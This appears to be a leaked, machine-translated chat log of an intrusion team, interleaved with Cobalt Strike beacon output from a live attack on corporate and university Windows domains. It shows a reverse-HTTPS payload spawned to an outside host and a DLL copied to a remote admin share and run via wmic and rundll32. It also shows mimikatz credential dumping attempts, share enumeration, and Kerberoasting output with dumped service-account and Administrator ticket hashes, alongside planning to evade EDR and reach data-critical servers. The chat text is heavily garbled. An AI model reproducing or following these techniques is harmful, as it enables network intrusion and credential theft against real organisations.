>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
Why? Yesterday @user8 was working with him how long ago, in the docs were the sessions were re-translated? @tl1 Well what is it? Maybe just datacenter? There are no others, in fact it turns out the same places from where last time you hit?
beacon> shell ping datacenter.local
[*] Tasked beacon to run: ping datacenter.local
[+] host called home, sent: 52 bytes
[+] received output:
Ping request could not find host datacenter.local. Please check the name and try again.

beacon> shell ping 10.225.10.200
[*] Tasked beacon to run: ping 10.225.10.200
[+] host called home, sent: 49 bytes
[+] received output:

Pinging 10.225.10.200 with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 10.225.10.200:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),


``AUSYDHC-ESP-DC1.legalco.holasal guys pinging it can be worked with via bind_pipe or other tulamia I remember that some domain is completely closed from the outside in terms of sessions
looking for faerai admin... if you can't find it there is an alternative solution but not very good...
Theoretically our .exe can even go under it, but it's a lottery and the chances are not in our favor.

@user3 from other domains that guys are now sitting in - also past? legalco.local servers and the domain is not pinged if you fuck with it directly))))) and dll is technically mmm also a binary) so disable like sofos? final binaries) dll of the binary?it will kill our binary processes and drop them from the network before it worked quietly and it's not much of a hindrance. the main problem i see is the phaea agents i mentioned above
looking for techs, avers, backups.
everything is standard, we just need to "finish" to the mind what we have here by tasks? ok, and then already portaskankilni dllkuvinlogon then my borders in the process do dllkoy datacenter here i'll take a global, dellkoy make datacenter myself and from there portaskan fuckinu, ok? tolerable
it's not worth it to multiply connects and move around. how gentle is portscan? @user1 we're trying to be gentle, see how cobalts fly off...ok now we'll work with user3 in user7's coba, pinging user3's coba is 100% loss before you pass it on others - ping out gently
icmp won't be an alert probably if https connect is flashed
the only way to get out is by pinging, right then and there. you also blocked me from the user3 coba the other day it's not even trying to get your coba into that network anymore. you andpacific probably you'll get a firewall. it's not a big deal to work with someone else's coba.204 from the session saig.frd.global pinged myself (firedi.com) and got a loss of 100%Very careful
in datacenter no abrupt moves and move "within" the domain, only from the point of entry and gently, ok jump through others who do not see the domain
all so far I'm not even talking about beacons - it's by itself, we don't know yet where the datacenter runs.... is datacenter.local - highest priority+@user1 @user3 confrm please+947ya+94ya+9ya +everyone understands what exactly needs to be prepared and find out?
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (regbest.com:443)
``minutes to regbest.com:443
from there we'll take it apart++ can we pass it on to the right trusts yourself?
here in this domain i have beck checking beck, if off - today we'll take on other thingsWill the others? i have datacenter sagged for 34 hours, saiglobal for 20 no one in the whole forest has a session left, right? passloft.com +stormname.com:443 pass me[ ](https://mediaeveryone.com/group/saiglobal-com?msg=4feA2KDB6sntzrit2) + firedi.com:443
it's from a subdivisionMail espreon.com passloft session at slypad.com:443@user3 your subjective opinion is it some kind of separate company or just a "department" legal ?
what are the as_users mail there ? legalco.local
for adusers 1181 i need all the data we have on domain administrators and network engineers
browsers/notes/documentation/kipasses/graphics - anything you think is at least relatively relevant and less than 4 years old@user7 similarly for users and cars@user9
look for virtualization servers, identify key techies in your domain (sysadmins, etc.) and look for their machines.[ ](https://mediaeveryone.com/group/saiglobal-com?msg=PzM6WCqTSMCZj5zC5) c360.local
1. windef(couldn't find more entries, but need to check)
2. categorized
4. No
all servers are spinning on wm, including both dksaiglobal tozhen standatd 6k users, the rest (which I worked on) much less at my datacenter dead@user8 scan more ranges of your domain at 80/443/445 for machines that are not part of the domain (NAS probably here - they are outside the domain too) the key domain - datacenter where we close the server segment is fireeye which today we need to solve a SERIOUS problem who works with large major domains with a large number of users - write me fine, deal with it thenall you said in the plan i'll scan everything, it's just that from my coba i couldn't get into the hr...za... the other day in general, the session to get, from there could not ping myself, worked from koba @user3 , now go there, long loading its destination) name of the domain datacenter as if hinted at) yes, already looked it uhm "egress routes" such if you can call it that)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7hMZEWZmvZG3dnpy) more, there are everywhere server windup simple
you need to see if "other" servers are visible from where the losses from these two-servers of the same group usually see each other, even if part of the group is closed to the rest of the segmentUSHDC1-CSPWEB18.datacenter.local
	USHDC1-CSPWEB22.datacenter.localBut there is a server with this prefix, which is in the visibility areaUSHDC1-CSPWEBYou do not see in the routes mostly servers with the prefix now look. magic if so - see what's on the file system and what data are on the drives + list of processes of servers in this group to form a correct impressionI guess you just switched the concept of NAS as a file storage?
occasionally
Very occasionally.
but it would be a neutered sevens or something like that in terms of identificationPresumably nas:
A ridiculous assumption, no offense. us - aka NAS - Network Attached - Storage.
NEVER identified as windows server 2012 I take it we are everywhere windup ? the hardware may not let icmp packets through but it does let various administration systems through100% Loss: - most likely behind the hardware, scan them to 80/443/3389/5900will see - I'll tell you what the tascii full domain compositiondatacenter.local is one of the key domains with critical data.
Download the categorization of datacenter.local
1. FireEye, Windows Defender
2. The categorization is
3. no we just need to collect this information, we need to find it in the logs/reports. Please write us all about the domains we are working with 1 - Is anti-virus/edr identified in all domains?
2 - Did you categorize server systems by purpose in all domains?
3 - Did you find the main segment where sysadmins and network-engineers are sitting? Let's do a quick walkthrough here
we need to decide if we're ready for the final phase of the problem with the network again the emphasis on the winlogon last output from winlogon not in the other to the swhost, in winlogon passed on one machine shot in swhostehere local users gives hashdump and in the mime hash computer and not a single userа it does not migrate thereа you shoot from winlogon? somewhere so `` gives out
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results
```
```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
``Priority on the host win-server by other hochuchek la current on tachkada unlikely it is castrated, most likely AB does not givehashdumps with mimic does not givev system processes not injctctitated some lA goes out got where tried above that i dumped was oldmag, already out newer i built the concatenation you dumped today i will build clean dllskin x64dll dirty no, as a matter of fact, there is no problem, i do not have any problem with it, i don`t have any problems with it`` ``.
beacon> shell copy x64.dll \139.62.166.164\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.166.164\C$\ProgramData
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8008;
	ReturnValue = 0;
};


beacon> shell dir \139.62.166.164\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \139.62.166.164\C$\ProgramData\x64.dll
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \139.62.166.164.\C$ is Windows
 Volume Serial Number is FC53-858D

 Directory of \139.62.166.164.164\C$\ProgramData

File Not Found
``Well, get into other hosts where you're adminska` ``I can say that we sat idle for a month, and I remember it only about Remote Admin= )Say that the first time I heard it):man_facepalming::thinking:your polzak there local admins can check there rps requests if your polzak see shara admin$$ in the course, yes?and why go there?) and there is nothing interesting all the same I on a few machines in the admin's balloon came `` ``
Shares for COB-65749:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
``````
Shares for COB-65749:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares
XDSPVSSERV05 what's your current drive? I'm browsing through SharpShares now, nothing particularly interesting I've found so far, what have you done in general or in the last +- hour?
beacon> psinject 15344 x64 Invoke-Kerberoast -domain itstest.ad | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -domain itstest.ad | fl into 15344 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:


TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : agpm-sa
DistinguishedName : CN=AGPM SA,OU=Users,OU=ITSTEST,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'FIMService/ITSTESTFIM.itstest.ad' from user 'CN=FIMService,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details".
TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : FIMService
DistinguishedName : CN=FIMService,OU=Service Accounts,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'host/certauth.testfs.auth.unf.edu' from user 'CN=ADFS2ServiceAcct,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : ADFS2ServiceAcct
DistinguishedName : CN=ADFS2ServiceAcct,OU=Service Accounts,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'http/ITSTESTFIM' from user 'CN=FIMAppPoolAcct,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
TicketByteHexStream :
Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : FIMAppPoolAcct
DistinguishedName : CN=FIMAppPoolAcct,OU=Service Accounts,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

TicketByteHexStream :
Hash : $krb5tgs$MSSQLSvc/itstestsql.itstest.ad:1433:0861B1ED986D8F5AA3F58217239AD6F
                       9$03246E66B21880706218CE9CFD8C8E00B41EA1C5E50328EBF95C81534D57D044D9BD85B548
                       6424FECB32BFE5E99A0A64E5BF1BC94D30F3C9B68C8EA2C92F1D5911348D59225B76565F76CD
                       02CB3EA4AD338CE03675A10A753284B8328081F8171C8F2CF5013D9CC7AD8A8E1C15F9B8EF31
                       2C1BD51E95B0FF011A17D53529A6054B55CE9DD46DCC7A20C937D67EDD1D430C007FAFABBE56
                       F8CD1CD8602496B2835E963D8396950808602D6099860A42EED104D420D4EBB8F31FE7DA6742
                       AB98354CC1D1CAAC3E4282B0BE33EEE459BCFE2AAFD7E8DFF35CC55229DBC62AA1C20F956395
                       1C0B3E207AA1B5380B1C1079A308A222896D44F8ACECAF1F8CE54E940F40EA9E24F34441D548
                       7FF45AE630EDA0EF78007828FEA99994D48D7657D94AF02FBD238C452EEDBB5567630F1D4640
                       B600FCBF238DB73679813EABBA0EECB7BF16466986B0E1A01BB736C7263B62AF675A2B3543D8
                       F4D4A5536FDC65C50B81FC25F2561B3761C91887255172E0F2A636EF5F7713D338082B8834A9
                       B44653813303DDFA9ECFE56BA2E86119683617A01E01D3A37AC35BF7969976E1B18B2AC24859
                       CFA53142E4ECB44AA9BD5FBF3FEEC8FCAF6F980BE7E279698A54B779D791EC336A224B72F574
                       4FB1957D9315C52DDD7DB52B4E4FF53F6AE7AEBCA41648D4C280B612B42D9C51B522F3B45C52
                       9DD08184D0A28AE5D858F1DA8D9DDB98F683BDA2472748FF03B78A16C2578ED51248022D23F7
                       CDB193BD35CF1CFC9BCF8E4D661E9808E887BC58A277E4638E31A5E05E07F7C365AC21C19464
                       06350BB301822C7FA27F3898F0F3EF0E6C9F8EB37CE1BFB5C42FC218C37BD19997EA420096EE
                       B8115D03718A9CBE86509EB0DE649E871EBD2127E165D1721216E6AFC5A067A8435E555C98A7
                       76D5EACA0308CF3E9A95A9F9C8CDD404B692BAD1062B6099AA4610026EADF3ED78F279456573
                       00246D5C804F1AE087D5E6955027D4FB36B43DCFDF66A135971AF3E6E0C2A469AEA8BC2DF816
                       CB919D8C24FEEFA9BD6B34AE078AA267945D667EACB2988DBC513B9346D38ED61F97D9CCB4B8
                       FC5F3789E5E7ACA2301BE8447ED3FF405446EFC729B3A6BC283A9420E9CC9C6C19C5FB61ABF3
                       41D1F9F7142D7225F5F4A57D4A50AFF1EACBC95801772D88571A8F35FB48DD857A7B53BDF224
                       1225BBD2B9A9F7BA3C4BC1B44710FB2199136E1F0D9616C42369FE9107C0D65DB66603513925
                       FBB37704550858012D53762239E38B668DB30744810B2852A8479CFA6D2DA14811D4ABBA7F7A
                       BF9F514BDE6AB9B483A2743D4384D9C878E9FC0FE0BA79B30673608129EF90FEFC7257CB34EF
                       E13A562E014517B622F9FF56339B8A4F37207193323E7904CC942A0FC5775D1407E3DDC4C206
                       E94346AC7798307556831413F5882883A7421090127EEA615FFA945291CA55D465328CB35181
                       EA37ACAF6E51F552174A20710540190E0E03A9BADBCECDCEAD95D59A8E56C7672B4FA69D2AED
                       1A07DE0B3CAE47D7E073A237F375D8C522F2962210B244C54683C37D587F19E6735E7F9E45C4
                       FD23422E9BA91ABBEF8AD3D9AB17DCE8496255467C65F1C8AE2E8A432F705A5DAD3D2C8328E1
                       A0BAC7C7417395DD68D4462C8A54AF4E0D1110E0CAFB65D53412A8FDA30A9EE603F0EEA6BB3F
                       DADE9B82B4CE3193FEF11A8618C9FB7CE4B352E73CC07259B0EAD6E4F405971579185607F372
                       A745C06B991DB27BA0F6C32B3E3717F45F8510699ABB5E3E2BF341111C235A66FE41CC1D4F1C
                       098B142E8BCD36D5F88770F6693185F6AB9EA8A89AC2A886683F66A84C3C8AA46989
SamAccountName : Administrator
DistinguishedName : CN=Administrator,OU=SysAdmins,OU=UNFUsers,DC=itstest,DC=ad
ServicePrincipalName : MSSQLSvc/itstestsql.itstest.ad:1433
``rubuus only kerberost in the trust under number 0 he trusts himself)``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
unfcsd.unf.edu
